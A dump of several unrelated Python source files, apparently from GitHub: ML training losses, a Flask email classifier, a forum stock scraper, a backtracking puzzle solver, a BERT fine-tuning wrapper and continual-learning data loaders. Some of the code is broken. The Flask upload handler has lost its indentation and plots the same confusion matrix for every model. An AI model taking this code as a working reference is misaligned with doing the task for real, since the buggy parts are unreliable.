    else:
        # Second stage: add the segmentation loss for samples that have a mask.
        _mask = mask_est[has_mask == 1]
        _gt_mask = gt_mask[has_mask == 1]
        if len(_mask) != 0 and len(_gt_mask) != 0:
            loss_seg = loss_fn_mask(_mask, _gt_mask)
            losses_seg.update(loss_seg.item(), batch_size)
            loss_all += args.seg_weight * loss_seg
        loss_all = args.texture_total_weight * loss_all
        losses_texture_total.update(loss_all.item(), batch_size)
        return loss_all, mask_est, detach_images, rendering, vertices
def train_hmr_using_adv_loss(
    HMR,
    texture_discriminator,
    texture_net,
    img_renderer,
    losses_disc_e,
    losses_disc,
    losses_disc_real,
    losses_disc_fake,
    img,
    batch_size,
):
    """Adversarial texture loss: render the predicted mesh with predicted
    textures over random indoor backgrounds, then compute encoder- and
    discriminator-side LSGAN losses.

    Returns (encoder loss, discriminator loss, composited rendering batch).
    NOTE(review): the background directory below is an absolute machine-local
    path -- confirm it exists on the training host.
    """
    output = HMR(img)[-1]
    vertices = output['verts']
    cam = output['theta'][:, :3]
    textures = texture_net(img)
    textures = textures.expand(-1, -1, 2, 2, 2, -1)
    mask, rendering = img_renderer(vertices, cam, textures)
    rendering_img = rendering.clone()
    # Pick one random background scene, then a random image + random 224x224
    # crop per sample in the batch.
    bg_idx = random.randint(1, 18)
    bg_list = glob.glob("/data/indoor_bg/train/LR/{}/color/*.png".format(bg_idx))
    cropped_bg_list = torch.zeros(batch_size, 3, 224, 224)
    for i in range(batch_size):
        random_idx = random.randint(0, len(bg_list)-1)
        bg_path = bg_list[random_idx]
        bg = cv2.imread(bg_path)
        bg_w, bg_h, _ = bg.shape
        h = w = 224
        rand_idx_w = int(np.random.randint(bg_w-w))
        rand_idx_h = int(np.random.randint(bg_h-h))
        cropped_bg = bg[rand_idx_w:rand_idx_w+w, rand_idx_h:rand_idx_h+h, :]/255.0
        cropped_bg = torch.from_numpy(cropped_bg).permute(2, 0, 1)
        cropped_bg_list[i] = cropped_bg
    cropped_bg_list = cropped_bg_list.to(rendering_img.device)
    # Composite: rendered person where the mask is on, background elsewhere.
    valid_mask = mask > 0
    valid_mask = valid_mask[:, None, :, :].type(torch.int)
    rendering_img_input = valid_mask * rendering_img + (1-valid_mask) * cropped_bg_list
    rendering_bg = rendering_img_input.clone().detach()
    # Discriminator expects ImageNet-normalized input, like `img`.
    for i in range(batch_size):
        rendering_img_input[i] = normalize(rendering_img_input[i])
    e_disc_loss = batch_encoder_disc_l2_loss(texture_discriminator(rendering_img_input))
    losses_disc_e.update(e_disc_loss.item(), batch_size)
    # Detach so discriminator updates do not flow back into HMR/texture_net.
    fake_rendering_img_input = rendering_img_input.clone().detach()
    real = texture_discriminator(img)
    fake = texture_discriminator(fake_rendering_img_input)
    d_disc_real, d_disc_fake, d_disc_loss = batch_adv_disc_l2_loss(real, fake)
    losses_disc.update(d_disc_loss.item(), batch_size)
    losses_disc_real.update(d_disc_real.item(), batch_size)
    losses_disc_fake.update(d_disc_fake.item(), batch_size)
    return e_disc_loss, d_disc_loss, rendering_bg
def batch_encoder_disc_l2_loss(disc_value):
    '''
    Encoder-side LSGAN loss: batch mean of the per-sample summed (D(x) - 1)^2.
    Inputs:
        disc_value: N x 25
    '''
    batch = disc_value.shape[0]
    squared_error = (disc_value - 1.0) ** 2
    return torch.sum(squared_error) * 1.0 / batch
def batch_adv_disc_l2_loss(real_disc_value, fake_disc_value):
    '''
    Discriminator-side LSGAN loss: push real scores to 1 and fake scores to 0.
    Inputs:
        disc_value: N x 25
    Returns (real loss, fake loss, their sum).
    '''
    n_real = real_disc_value.shape[0]
    n_fake = fake_disc_value.shape[0]
    la = torch.sum((real_disc_value - 1) ** 2) / n_real
    lb = torch.sum(fake_disc_value ** 2) / n_fake
    return la, lb, la + lb
2051327559 | ##https://towardsdatascience.com/develop-a-nlp-model-in-python-deploy-it-with-flask-step-by-step-744f3bdd7776
from flask import Flask, request, jsonify,render_template,redirect,flash
import pandas as pd
import matplotlib.pyplot as plt
#from flask_cors import CORS
from data_Preprocessing import DataPreprocessing
from vectorization import Embedding
from models import model
import os
from predict_model import predict
from dataVisualization import DataVisualization
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
app = Flask(__name__, static_url_path='')
#app = Flask(__name__, static_url_path = "/static", static_folder = "static")
@app.route('/')
def home():
    """Render the landing (index) page."""
    return render_template('index.html')
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
#print(request.files['file-7[]'])
#import pdb;pdb.set_trace();
f = request.files['file-7[]']
#data_xls = pd.read_excel(f)
resp = DataPreprocessing()
data_df = resp.preprocessing(f)
#print(data_df)
##Object for Vectorization
target_names = ['Cancellation_Rescheduling','EDI_CustomerProgram','Escalation_Linedown',
'Logistic_changes','MDL_Exclusion','NewPO_Forecast',
'OrderEnquiry','Other','POChanges','RMA' ]
class_vector = Embedding()
X_train, X_test, Y_train, Y_test=class_vector.input_data(data_df)
count_train,count_test = class_vector.Countvectorization(X_train, X_test)
tfidf_train,tfidf_test = class_vector.TfIdfVectorization(X_train, X_test)
##Created Objects for models
models=model()
vis = DataVisualization()
##multinomialNB
nb_pred_test,nb_pred_test_tfidf=models.multinomialNB(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("----NaiveBayes model Using Count Vectors----")
print(classification_report(Y_test, nb_pred_test))
nbcm1 = confusion_matrix(Y_test, nb_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm1, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/NB_CountVector.png')
##confusion matrix and classification report using Tfidf
print("------NaiveBayes model Using Tfidf -----")
nbcm2 = confusion_matrix(Y_test,nb_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/NB_TfIdf.png')
##supportVectorMachine
svmc_pred_test,svmc_pred_test_tfidf = models.supportVectorMachine(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("----SVM Using Count Vectors----")
print(classification_report(Y_test, svmc_pred_test))
svmcm1 = confusion_matrix(Y_test,svmc_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/svmCount.png')
##confusion matrix and classification report using Tfidf
print("--------SVM Tfidf------")
print(classification_report(Y_test,svmc_pred_test_tfidf))
svmcm1 = confusion_matrix(Y_test,svmc_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/svmTfidf.png')
##decisionTreeClassifier
dtc_pred_test,dtc_pred_test_tfidf=models.decisionTreeClassifier(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------Decision CountVector------")
print(classification_report(Y_test,dtc_pred_test))
dtc1 = confusion_matrix(Y_test,dtc_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/dtc_Count.png')
##confusion matrix and classification report using Tfidf
print("--------Decision tfidf------")
print(classification_report(Y_test,dtc_pred_test_tfidf))
dtc2 = confusion_matrix(Y_test,dtc_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/dtc_Tfidf.png')
##randomClassifier
random_pred_test,random_pred_test_tfidf=models.randomClassifier(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------RandomForest CountVector------")
print(classification_report(Y_test,random_pred_test))
randomclassifier1 = confusion_matrix(Y_test,random_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/RF_Count.png')
##confusion matrix and classification report using Tfidf
print("--------RandomForest tfidf------")
print(classification_report(Y_test,dtc_pred_test_tfidf))
randomclassifier2 = confusion_matrix(Y_test,random_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/RF_Tfidf.png')
##LogisticRegression
logeg_test,logreg_tfidf_test= models.LogisticRegression(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("--------LogisticRegression CountVector------")
print(classification_report(Y_test,logeg_test))
randomclassifier1 = confusion_matrix(Y_test,logeg_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/logreg_Count.png')
##confusion matrix and classification report using Tfidf
print("--------LogisticRegression tfidf------")
print(classification_report(Y_test,logreg_tfidf_test))
randomclassifier2 = confusion_matrix(Y_test,logreg_tfidf_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/logreg_Tfidf.png')
##XGBootClassification
xgb_pred_test,xgb_pred_test_tfidf=models.XGBootClassification(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("-------- XGBootClassification CountVector------")
print(classification_report(Y_test,xgb_pred_test))
randomclassifier1 = confusion_matrix(Y_test,xgb_pred_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/xgb_Count.png')
##confusion matrix and classification report using Tfidf
print("--------XGBootClassification tfidf------")
print(classification_report(Y_test,xgb_pred_test_tfidf))
randomclassifier2 = confusion_matrix(Y_test,xgb_pred_test_tfidf)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/xgb_Tfidf.png')
##KNNCLassification
modelknn_test, modelknn_tfidf_test = models.KNNCLassification(count_train,count_test,tfidf_train,tfidf_test,Y_train,Y_test)
##confusion matrix and classification report using CoutVectorization
print("-------- KNN Classification CountVector------")
print(classification_report(Y_test,modelknn_test))
randomclassifier1 = confusion_matrix(Y_test,modelknn_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/knn_Count.png')
##confusion matrix and classification report using Tfidf
print("--------KNN Classification tfidf------")
print(classification_report(Y_test,modelknn_tfidf_test))
randomclassifier2 = confusion_matrix(Y_test,modelknn_tfidf_test)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111)
vis.plot_confusion_matrix(nbcm2, classes=target_names)
plt.savefig('/home/allu/Documents/TCSProjetcs/EmailClassification/static/images/knn_Tfidf.png')
return render_template('home.html')
#return 'File Uploaded successfully'
#print(data_xls)
#return data_xls.to_html()
return render_template('file.html')
#return "File uploaded successfully"
@app.route("/predict", methods=['GET', 'POST'])
def predictor():
    """GET: show the prediction form.  POST: classify the submitted mail
    text and render the result table."""
    model = predict()
    if request.method != 'POST':
        return render_template('predict.html')
    result = model.prediction([request.form['mail']])
    return render_template('sample.html',
                           tables=[result.to_html(classes='data')],
                           titles=result.columns.values)
@app.route("/evalute")
def evalute():
    """Render the evaluation dashboard page (dash.html)."""
    # NOTE(review): the route name "evalute" looks like a typo for
    # "evaluate", but renaming it would change the public URL.
    return render_template('dash.html')
@app.route("/export", methods=['GET'])
def export_records():
    """Stub endpoint: export is not implemented yet.

    Returning None from a Flask view raises an error if this route is
    actually hit -- a real response body still needs to be added here.
    """
    return
if __name__ == "__main__":
    # Start the Flask development server (not suitable for production).
    app.run()
| Pooja-AI/Email-Classification | file.py | file.py | py | 10,841 | python | en | code | 0 | github-code | 36 |
from my_radial_grid import *

# Radial grid shape:
#            a g
#   r(g) = -------,   g = 0, 1, ..., N - 1
#          1 - b g
beta = 0.4
N = 150*(2 + 1)
ae_grid = MyAERadialGridDescriptor(beta/N, 1.0/N, N)

print("Grid parameters:")
print("a = ", ae_grid.a)
print("b = ", ae_grid.b)

# Dump every grid point alongside its derivative.
r_g = ae_grid.r_g
dr_g = ae_grid.dr_g
for g in range(len(ae_grid)):
    print("{:18.10f} {:18.10f}".format(r_g[g], dr_g[g]))
41166932292 | # pip install requests bs4 lxml
# pip install jieba
import requests
import bs4
import jieba
import csv
stocks = set()
def prepare_stocks():
    """Load stock names from week3/Stock.csv into the module-level `stocks` set."""
    with open('week3/Stock.csv', encoding='utf-8') as csv_file:
        rows = list(csv.reader(csv_file))
    # The first two rows are header/metadata; column 1 holds the stock name.
    for row in rows[2:]:
        stocks.add(row[1])
def get_text(o):
    """Return o.text, or the empty string when o is None (missing tag)."""
    return o.text if o is not None else ''
def read_article(url):
    """Fetch one PTT article and, for every push (comment), print how often
    each known stock name appears in the comment text.

    `url` is the article path relative to https://www.ptt.cc.
    """
    html = requests.get('https://www.ptt.cc' + url)
    soup = bs4.BeautifulSoup(html.text, 'lxml')
    for row in soup.select('div.push'):
        content = get_text(row.select_one('.push-content'))
        # `issuer` and `created` were extracted but never used; dropped.
        keywords = {}
        for token in jieba.lcut(content):
            if token in stocks:
                # dict.get with a default replaces the verbose if/else counting
                keywords[token] = keywords.get(token, 0) + 1
        print(keywords)
def read_topic():
    """Scan the PTT Stock board index page: for every article, count stock
    names appearing in the title, print the counts, then crawl the article's
    pushes via read_article()."""
    html = requests.get('https://www.ptt.cc/bbs/Stock/index.html')
    soup = bs4.BeautifulSoup(html.text, 'lxml')
    for row in soup.select('div.r-ent'):
        anchor = row.select_one('.title a')
        if anchor is None:
            # deleted articles have no title link
            continue
        url = anchor['href']
        title = anchor.text
        # `count`, `issuer` and `created` were extracted but never used; dropped.
        keywords = {}
        for token in jieba.lcut(title):
            if token in stocks:
                keywords[token] = keywords.get(token, 0) + 1
        print(keywords)
        read_article(url)


prepare_stocks()
read_topic()
37502377637 | # https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV4suNtaXFEDFAUf
"""
A straightforward backtracking/implementation problem.
Prune the search whenever the cores already connected plus the cores still
left to try cannot exceed the best core count found so far.
"""
# Movement deltas: up, down, left, right.
dire = [[-1, 0], [1, 0], [0, -1], [0, 1]]
def DRAW(x, y, d, graph):
    """Try to draw a wire from the core at (x, y) straight to the board edge
    in direction `d`.

    First pass: scan to the edge and abort if any cell holds a core
    (graph == 1) or an already-drawn wire (visit == 1).  Second pass: mark
    the wire cells in the module-level `visit` grid.

    Returns [1, wire_length] on success, [0, 0] if the path is blocked.
    """
    tx, ty = x + dire[d][0], y + dire[d][1]
    while 0 <= tx < len(graph) and 0 <= ty < len(graph):
        if graph[tx][ty] == 1 or visit[tx][ty] == 1:
            return [0, 0]
        tx += dire[d][0]
        ty += dire[d][1]
    # Path is clear: walk it again and mark every wire cell.
    result = 0
    tx, ty = x + dire[d][0], y + dire[d][1]
    while 0 <= tx < len(graph) and 0 <= ty < len(graph):
        visit[tx][ty] = 1
        result += 1
        tx += dire[d][0]
        ty += dire[d][1]
    return [1, result]
def REMOVE(x, y, d, graph):
    """Erase a wire previously drawn from (x, y) in direction `d`
    by clearing the corresponding cells of the module-level `visit` grid."""
    dx, dy = dire[d]
    size = len(graph)
    cx, cy = x + dx, y + dy
    while 0 <= cx < size and 0 <= cy < size:
        visit[cx][cy] = 0
        cx += dx
        cy += dy
def BACK(depth: int, useCore : int, value : int):
    """Backtracking over the interior cores in `location`.

    `depth`  -- index of the core being decided,
    `useCore` -- cores connected so far,
    `value`   -- total wire length so far.
    Updates the globals `MaxCore` (max connected cores) and `ans`
    (min wire length among solutions with MaxCore cores).
    """
    global ans, MaxCore
    # Prune: even if every remaining core were connected, we could not
    # beat the best core count found so far.
    if MaxCore > useCore + (len(location) - depth): return
    if depth == len(location):
        # Same number of connected cores: keep the minimum total wire length.
        if useCore == MaxCore and value > ans : return
        MaxCore = useCore
        ans = value
        return
    for i in range(4):
        us = DRAW(location[depth][0], location[depth][1], i, graph)
        useCore += us[0]
        value += us[1]
        BACK(depth + 1, useCore, value)
        # NOTE(review): the "leave this core unconnected" option is only
        # explored implicitly when DRAW fails (us == [0, 0]); if all four
        # directions succeed, skipping the core is never tried -- confirm
        # this cannot miss an optimal solution.
        if us[0] == 1: REMOVE(location[depth][0], location[depth][1], i, graph)
        useCore -= us[0]
        value -= us[1]
# Read T test cases; for each, collect the interior cores and search.
T = int(input())
for test_case in range(1, T + 1):
    N = int(input())
    location = []  # interior cores that still need wiring to the edge
    graph = []
    visit = [[0] * N for _ in range(N)]  # cells already occupied by wires
    for i in range(N):
        arr = list(map(int, input().split()))
        for j in range(N):
            # Cores on the border are already connected, so only the
            # interior cores are collected for the search.
            if 0 < i < N - 1 and 0 < j < N - 1 and arr[j]:
                location.append([i, j])
        graph.append(arr)
    ans = 0x7fffffff  # min total wire length for the best core count
    MaxCore = 0       # max number of cores connected so far
    BACK(0, 0, 0)
    print(f"#{test_case} {ans}")
| junsgi/Algorithm | BackTracking/[SW Test 샘플문제] 프로세서 연결하기.py | [SW Test 샘플문제] 프로세서 연결하기.py | py | 2,239 | python | ko | code | 0 | github-code | 36 |
8591398196 | import torch
import torch.nn as nn
import torch.nn.functional as F
import copy
import numpy as np
from itertools import chain
class SurgicalFineTuningBert(nn.Module):
    """BERT classifier wrapper for "surgical" fine-tuning.

    Every component (embeddings, each encoder layer, pooler, classifier) is
    duplicated into a trainable ("opti") copy and a frozen deep copy.  Each
    stage's output is a convex combination of the two copies, gated by a
    learnable scalar alpha squashed through a sigmoid, so the model learns
    per-component how much fine-tuning to apply.
    """
    def __init__(
        self,
        bert_model,
    ) -> None:
        super().__init__()
        # Borrow the helper that broadcasts a 2D attention mask to 4D.
        self.get_extended_attention_mask = bert_model.get_extended_attention_mask
        # copy the model: the "opti" modules share weights with `bert_model`
        # and remain trainable; the "frozen" ones are deep copies.
        self.opti_embedding_block = bert_model.bert.embeddings
        self.frozen_embedding_block = copy.deepcopy(self.opti_embedding_block)
        self.opti_bert_layers = bert_model.bert.encoder.layer
        self.frozen_bert_layers = copy.deepcopy(self.opti_bert_layers)
        self.opti_bert_pooler = bert_model.bert.pooler
        self.frozen_bert_pooler = copy.deepcopy(self.opti_bert_pooler)
        self.opti_bert_classifier = bert_model.classifier
        self.frozen_bert_classifier = copy.deepcopy(self.opti_bert_classifier)
        # Disable gradients for every frozen copy.
        frozen_params = chain(
            self.frozen_embedding_block.parameters(),
            self.frozen_bert_layers.parameters(),
            self.frozen_bert_pooler.parameters(),
            self.frozen_bert_classifier.parameters(),
        )
        for param in frozen_params:
            param.requires_grad = False
        self.dropout = nn.Sequential(bert_model.dropout)
        # One gate per encoder layer plus gates for embeddings / pooler /
        # classifier.  NOTE(review): small/medium BERTs get n_layers + 3
        # gates but every other model gets n_layers + 1, while forward()
        # always reads alphas[0], alphas[:-2], alphas[-2] and alphas[-1]
        # -- confirm the intended gate layout for the n_layers + 1 case.
        if (
            "bert-small" in bert_model.name_or_path
            or "bert-med" in bert_model.name_or_path
        ):
            self.alphas = nn.Parameter(
                torch.zeros(len(bert_model.bert.encoder.layer) + 3)
            )
        else:
            self.alphas = nn.Parameter(
                torch.zeros(len(bert_model.bert.encoder.layer) + 1)
            )

    def forward(self, x):
        """Blend the trainable and frozen submodules, gated by self.alphas.

        `x` is a dict with "input_ids" and "attention_mask" tensors; returns
        the classifier logits.
        """
        input_ids, attention_mask = x["input_ids"], x["attention_mask"]
        extended_attention_mask = self.get_extended_attention_mask(
            attention_mask, input_ids.size()
        )
        # NOTE(review): alphas[:-2] starts at index 0, so alphas[0] serves
        # both as the embedding gate and as layer 0's gate -- confirm.
        alpha_embeddings, alphas_layers, alpha_pooler, alpha_classifier = (
            self.alphas[0],
            self.alphas[:-2],
            self.alphas[-2],
            self.alphas[-1],
        )
        # NOTE(review): the unblended embeddings below are fed to layer 0
        # (only i > 0 reuses the blended x), and each embedding block runs
        # twice -- confirm this duplication is intentional.
        x_opti, x_frozen = self.opti_embedding_block(
            input_ids
        ), self.frozen_embedding_block(input_ids)
        a = alpha_embeddings.sigmoid()
        x = a * self.opti_embedding_block(input_ids) + (
            1 - a
        ) * self.frozen_embedding_block(input_ids)
        for i in range(len(self.opti_bert_layers)):
            a = alphas_layers[i].sigmoid()
            if i > 0:
                x_opti, x_frozen = x, x
            x = (
                a
                * self.opti_bert_layers[i](
                    x_opti, attention_mask=extended_attention_mask
                )[0]
                + (1 - a)
                * self.frozen_bert_layers[i](
                    x_frozen, attention_mask=extended_attention_mask
                )[0]
            )
        a = alpha_pooler.sigmoid()
        x = a * self.opti_bert_pooler(x) + (1 - a) * self.frozen_bert_pooler(x)
        x = self.dropout(x)
        a = alpha_classifier.sigmoid()
        x = a * self.opti_bert_classifier(x) + (1 - a) * self.frozen_bert_classifier(x)
        return x

    def forward_alphas(self, x, alphas):
        """Same computation as forward(), but with externally supplied gate
        values `alphas` instead of the learned self.alphas."""
        alpha_embeddings, alphas_layers, alpha_pooler, alpha_classifier = (
            alphas[0],
            alphas[:-2],
            alphas[-2],
            alphas[-1],
        )
        input_ids, attention_mask = x["input_ids"], x["attention_mask"]
        extended_attention_mask = self.get_extended_attention_mask(
            attention_mask, input_ids.size()
        )
        a = alpha_embeddings.sigmoid()
        x = a * self.opti_embedding_block(input_ids) + (
            1 - a
        ) * self.frozen_embedding_block(input_ids)
        # Same layer-0 behaviour as forward(): see the review note there.
        x_opti, x_frozen = self.opti_embedding_block(
            input_ids
        ), self.frozen_embedding_block(input_ids)
        for i in range(len(self.opti_bert_layers)):
            a = alphas_layers[i].sigmoid()
            if i > 0:
                x_opti, x_frozen = x, x
            x = (
                a
                * self.opti_bert_layers[i](
                    x_opti, attention_mask=extended_attention_mask
                )[0]
                + (1 - a)
                * self.frozen_bert_layers[i](
                    x_frozen, attention_mask=extended_attention_mask
                )[0]
            )
        a = alpha_pooler.sigmoid()
        x = a * self.opti_bert_pooler(x) + (1 - a) * self.frozen_bert_pooler(x)
        x = self.dropout(x)
        a = alpha_classifier.sigmoid()
        x = a * self.opti_bert_classifier(x) + (1 - a) * self.frozen_bert_classifier(x)
        return x

    def get_alphas(self):
        """Return the sigmoid of every gate as plain floats (for logging)."""
        return [float(a.sigmoid()) for a in self.alphas]
| AntoineBigeard/NLPSurgicalFineTuning | src/pimped_bert.py | pimped_bert.py | py | 4,780 | python | en | code | 2 | github-code | 36 |
70345439783 | import os
import sys
import pdb
import torch
import numpy as np
import pickle as pkl
from PIL import Image
from random import shuffle
from torchvision import datasets, transforms
""" Template Dataset with Labels """
class XYDataset(torch.utils.data.Dataset):
    """Simple (x, y) dataset; any extra kwargs become attributes
    (e.g. `source`, `transform`, or the inverse permutation used to
    'unscramble' permuted-mnist samples for plotting)."""

    def __init__(self, x, y, **kwargs):
        self.x, self.y = x, y
        for name, value in kwargs.items():
            setattr(self, name, value)

    def __len__(self):
        return len(self.x)

    def __getitem__(self, idx):
        sample, label = self.x[idx], self.y[idx]
        if type(sample) == torch.Tensor:
            sample = sample.float() / 255.
            label = label.long()
        else:
            # mini-imagenet stores file paths: load and transform the image
            sample = self.transform(Image.open(sample).convert('RGB'))
            label = torch.Tensor(1).fill_(label).long().squeeze()
        # for some reason mnist does better in [0, 1] than in [-1, 1]
        if self.source == 'mnist':
            return sample, label
        return (sample - 0.5) * 2, label
""" Template Dataset for Continual Learning """
class CLDataLoader(object):
    """Wraps one DataLoader per task for continual-learning experiments.

    Training loaders use `args.batch_size` and drop the last incomplete
    batch; evaluation loaders use a fixed batch size of 64 and keep it.
    """

    def __init__(self, datasets_per_task, args, train=True):
        batch = args.batch_size if train else 64
        self.datasets = datasets_per_task
        self.loaders = [
            torch.utils.data.DataLoader(
                ds, batch_size=batch, shuffle=True,
                drop_last=train, num_workers=0)
            for ds in self.datasets
        ]

    def __getitem__(self, idx):
        return self.loaders[idx]

    def __len__(self):
        return len(self.loaders)
""" Split CIFAR10 into 5 tasks {{0,1}, ... {8,9}} """
def get_split_cifar10(args):
    """Download CIFAR-10 and split it into 5 class-incremental tasks of
    2 classes each.

    Mutates `args` with dataset-specific settings and returns
    (train_ds, val_ds, test_ds): three iterables of XYDataset, one per task.
    """
    assert '1.' in str(torch.__version__)[:2], 'Use Pytorch 1.x!'
    args.n_tasks = 5
    args.n_classes = 10
    args.buffer_size = args.n_tasks * args.mem_size * 2
    args.use_conv = True
    args.n_classes_per_task = 2
    args.input_size = [3, 32, 32]
    args.input_type = 'continuous'
    # Data is rescaled to [-1, 1] below, so a Bernoulli loss makes no sense.
    # (Fixed: the original used `is not`, an identity check, which is not a
    # reliable string comparison.)
    assert args.output_loss != 'bernouilli'
    if args.output_loss is None:
        # TODO(multinomial is broken)
        args.output_loss = 'mse'
        print('\nsetting output loss to MSE')
    # fetch CIFAR-10 (train and test splits)
    train = datasets.CIFAR10('Data/', train=True, download=True)
    test = datasets.CIFAR10('Data/', train=False, download=True)
    # torchvision renamed these attributes across versions
    try:
        train_x, train_y = train.data, train.targets
        test_x, test_y = test.data, test.targets
    except AttributeError:
        train_x, train_y = train.train_data, train.train_labels
        test_x, test_y = test.test_data, test.test_labels
    # sort samples by label so each task is a contiguous slice
    out_train = [
        (x, y) for (x, y) in sorted(zip(train_x, train_y), key=lambda v: v[1])]
    out_test = [
        (x, y) for (x, y) in sorted(zip(test_x, test_y), key=lambda v: v[1])]
    train_x, train_y = [
        np.stack([elem[i] for elem in out_train]) for i in [0, 1]]
    test_x, test_y = [
        np.stack([elem[i] for elem in out_test]) for i in [0, 1]]
    train_x = torch.Tensor(train_x).permute(0, 3, 1, 2).contiguous()
    test_x = torch.Tensor(test_x).permute(0, 3, 1, 2).contiguous()
    train_y = torch.Tensor(train_y)
    test_y = torch.Tensor(test_y)
    # boundary index of each class in the sorted label vector
    train_idx = [((train_y + i) % 10).argmax() for i in range(10)]
    train_idx = [0] + [x + 1 for x in sorted(train_idx)]
    test_idx = [((test_y + i) % 10).argmax() for i in range(10)]
    test_idx = [0] + [x + 1 for x in sorted(test_idx)]
    train_ds, test_ds = [], []
    skip = 10 // 5  # classes per task
    for i in range(0, 10, skip):
        tr_s, tr_e = train_idx[i], train_idx[i + skip]
        te_s, te_e = test_idx[i], test_idx[i + skip]
        train_ds += [(train_x[tr_s:tr_e], train_y[tr_s:tr_e])]
        test_ds += [(test_x[te_s:te_e], test_y[te_s:te_e])]
    train_ds, val_ds = make_valid_from_train(train_ds)
    train_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), train_ds)
    val_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), val_ds)
    test_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), test_ds)
    return train_ds, val_ds, test_ds
def get_split_cifar100(args):
    """Download CIFAR-100 and split it into 20 class-incremental tasks of
    5 classes each.

    Mutates `args` with dataset-specific settings and returns
    (train_ds, val_ds, test_ds): three iterables of XYDataset, one per task.
    """
    assert '1.' in str(torch.__version__)[:2], 'Use Pytorch 1.x!'
    args.n_tasks = 20
    args.n_classes = 100
    args.buffer_size = args.n_tasks * args.mem_size * 5
    args.use_conv = True
    args.n_classes_per_task = 5
    args.input_size = [3, 32, 32]
    args.input_type = 'continuous'
    # Data is rescaled to [-1, 1] below, so a Bernoulli loss makes no sense.
    # (Fixed: the original used `is not`, an identity check, which is not a
    # reliable string comparison.)
    assert args.output_loss != 'bernouilli'
    if args.output_loss is None:
        # TODO(multinomial is broken)
        args.output_loss = 'mse'
        print('\nsetting output loss to MSE')
    # fetch CIFAR-100 (train and test splits)
    train = datasets.CIFAR100('Data/', train=True, download=True)
    test = datasets.CIFAR100('Data/', train=False, download=True)
    # torchvision renamed these attributes across versions
    try:
        train_x, train_y = train.data, train.targets
        test_x, test_y = test.data, test.targets
    except AttributeError:
        train_x, train_y = train.train_data, train.train_labels
        test_x, test_y = test.test_data, test.test_labels
    # sort samples by label so each task is a contiguous slice
    out_train = [
        (x, y) for (x, y) in sorted(zip(train_x, train_y), key=lambda v: v[1])]
    out_test = [
        (x, y) for (x, y) in sorted(zip(test_x, test_y), key=lambda v: v[1])]
    train_x, train_y = [
        np.stack([elem[i] for elem in out_train]) for i in [0, 1]]
    test_x, test_y = [
        np.stack([elem[i] for elem in out_test]) for i in [0, 1]]
    train_x = torch.Tensor(train_x).permute(0, 3, 1, 2).contiguous()
    test_x = torch.Tensor(test_x).permute(0, 3, 1, 2).contiguous()
    train_y = torch.Tensor(train_y)
    test_y = torch.Tensor(test_y)
    # boundary index of each class in the sorted label vector
    train_idx = [((train_y + i) % 100).argmax() for i in range(100)]
    train_idx = [0] + [x + 1 for x in sorted(train_idx)]
    test_idx = [((test_y + i) % 100).argmax() for i in range(100)]
    test_idx = [0] + [x + 1 for x in sorted(test_idx)]
